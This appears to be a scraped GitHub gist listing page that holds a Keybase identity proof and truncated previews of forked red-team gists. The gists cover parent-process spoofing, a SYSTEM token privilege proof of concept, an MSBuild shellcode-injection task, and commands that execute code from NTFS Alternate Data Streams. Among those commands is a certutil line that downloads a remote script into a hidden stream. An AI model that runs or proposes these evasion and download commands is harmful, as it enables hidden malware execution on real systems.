I hereby claim:
- I am 753c33686578 on github.
- I am 753c33686578 (https://keybase.io/753c33686578) on keybase.
- I have a public key ASDBt6J12LSYoCKOUT010GRF9tApLWk1OLjTYmgZ_ou5sgo
To claim this, I am signing this object:
753c33686578
753c33686578
/ blockdlls_gadget2jscript.cs
Created
August 24, 2020 07:27
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
753c33686578
/ getsystem_parent.cpp
Created
February 24, 2020 17:15
— forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
| TOKEN_PRIVILEGES tp; | |
| LUID luid; | |
| TOKEN_PRIVILEGES tpPrevious; | |
| DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
| if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
753c33686578
/ Exe_ADS_Methods.txt
Created
February 5, 2020 10:20
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Add content to ADS### | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
753c33686578
/ msbuild_inline_task_parent_process_spoof.txt
Created
February 5, 2020 10:13
— forked from rvrsh3ll/msbuild_inline_task_parent_process_spoof.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="MyTarget"> | |
| <SimpleTask MyProperty="My voice is my passport." | |
| MyCode='<base64 encoded x64 shellcode>' | |
| MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
| </Target> | |
| <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
| </Project> | |
753c33686578
/ PPID Spoof & BlockDLLs
Created
February 5, 2020 10:13
— forked from rasta-mouse/PPID Spoof & BlockDLLs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
753c33686578
/ keybase.md
Created
March 9, 2018 07:25